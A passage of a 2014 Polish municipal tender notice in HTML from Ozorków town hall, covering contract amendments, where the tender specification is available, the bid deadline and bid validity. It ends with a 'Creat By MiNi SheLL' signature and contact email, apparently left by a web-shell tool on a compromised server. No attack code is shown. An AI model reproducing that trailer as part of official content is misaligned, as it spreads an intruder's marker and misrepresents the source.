- zmiany regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy wraz ze skutkami wprowadzenia takiej zmiany.
Zmiany, o których mowa wyżej wymagają pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ozorkow.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ozorkowie
ul. Wigury 1
95- 035 Ozorków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2014 godzina 10:00, miejsce: Urząd Miejski w Ozorkowie
ul. Wigury 1
95- 035 Ozorków
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com